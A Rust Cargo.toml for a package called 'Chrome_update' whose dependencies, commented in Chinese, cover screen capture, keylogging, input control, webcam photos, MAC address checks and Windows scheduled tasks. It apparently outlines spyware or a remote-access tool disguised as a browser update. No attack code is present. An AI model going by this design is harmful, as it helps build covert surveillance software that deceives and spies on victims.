[package]
name = "Chrome_update"
version = "0.1.0"
edition = "2021"
build = "src/build.rs"

[dependencies]
# std = { default-features = false, features=[ "panic_immediate_abort" ] }
# json序列化工具
serde = { version = "1.0", features = ["derive"] }
serde_json = "1.0"
# 系统信息
sys-info = "0.9"
# 截屏
screen-capturer = "0.1.1"
# 键盘监听
device_query = "1.0.0"
# 鼠标键盘控制
enigo = "0.0.14"
# base64
base64 = "0.13.0"
# mac地址检查
mac_address = "1.1.3"

[target.'cfg(windows)'.dependencies]
# 字符编码
encoding = "0.2.33"
# camera
# camera_capture = "0.5.0"
# 摄像头拍照
escapi = "4"
image = "0.13"
# 计划任务
windows-taskscheduler = { git = "https://github.com/j-hc/windows-taskscheduler-api-rust.git" }
# 硬盘列表
disk_list = "0.2.8"

[target.'cfg(windows)'.build-dependencies]
winres = "0.1"

# 打包体积优化
[profile.release]
opt-level = 'z'
lto = true
codegen-units = 1
panic = 'abort'
strip = true  # Automatically strip symbols from the binary.